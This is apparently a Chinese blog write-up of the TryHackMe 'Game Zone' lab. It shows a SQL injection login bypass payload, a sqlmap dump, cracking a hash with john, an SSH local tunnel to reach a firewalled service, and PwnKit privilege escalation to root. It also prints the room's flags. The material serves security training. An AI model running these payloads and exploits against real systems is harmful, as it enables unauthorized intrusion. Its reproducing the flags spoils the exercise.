TryHackMe-进攻性渗透测试-04_GameZone

Game Zone

本房间将介绍SQLi(手动或通过SQLMap利用此漏洞),破解用户散列密码,使用SSH隧道揭示隐藏的服务以及使用metasploit有效负载获得root权限。


循例 nmap扫,只开22和80

看web,一个怀念版的游戏登录界面

随手试了一下:

admin' or '1'='1'#

进去了

一个搜索页面,按照题目的要求,这里使用sqlmap

开启burp,正常发起搜索,然后在burp将该请求的信息导出到文件

使用sqlmap

┌──(root💀kali)-[/home/sugobet]
└─# sqlmap -r ./req.txt --dbms=mysql -dump

john爆破hash密码

┌──(root💀kali)-[/home/sugobet]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash --format=raw-sha256

登录ssh成功

agent47@gamezone:~$ cat user.txt
649ac17b1480ac13ef1e4fa579dac95c

知识点:

反向 SSH 端口转发指定将远程服务器主机上的给定端口转发到本地端的给定主机和端口。

-L 是一个本地隧道(你< - 客户端)。如果站点被阻止,您可以将流量转发到您拥有的服务器并查看它。例如,如果 imgur 在工作中被阻止,你可以执行 ssh -L 9000:imgur.com:80 user@example.com。 转到计算机上的localhost:9000,将使用其他服务器加载imgur流量。

-R 是一个远程隧道(YOU --> CLIENT)。您将流量转发到其他服务器供其他人查看。与上面的例子类似,但相反。

.

我们将使用一个名为 ss 的工具来调查主机上运行的套接字。

如果我们运行 ss -tulpn,它会告诉我们正在运行哪些套接字连接

论点	描述
-t	显示 TCP 套接字
-u	显示 UDP 套接字
-l	仅显示侦听套接字
-p	显示使用套接字的进程
-n	不解析服务名称

ss -tulpn

发现有个tcp 10000端口开启

在目标上使用curl能够得知其服务是web,但是似乎被防火墙拦截了,该端口无法被外网访问。

我们使用该ssh用户进行流量转发

┌──(root💀kali)-[/home/sugobet]
└─# ssh -L 8888:127.0.0.1:10000 agent47@10.10.200.149

将我们本地的8888端口流量通过ssh转发到目标的10000端口

访问我们本地的8888端口,看见是一个登录页面

我们已知的就是agent47的ssh登录凭据,尝试登录,成功


题目要求我们寻找cms的cve,但我偏不

我使用了pwnkit(CVE-2021-4034) 对pkexec的利用

agent47@gamezone:~$ ./PwnKit 
root@gamezone:/home/agent47# whoami
root
root@gamezone:/home/agent47# cat /root/root.txt
a4b945830144bdd71908d12d902adeee

看到ubuntu版本为16.04,我猜可能还存在cve-2021-3493 overlayfs利用

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值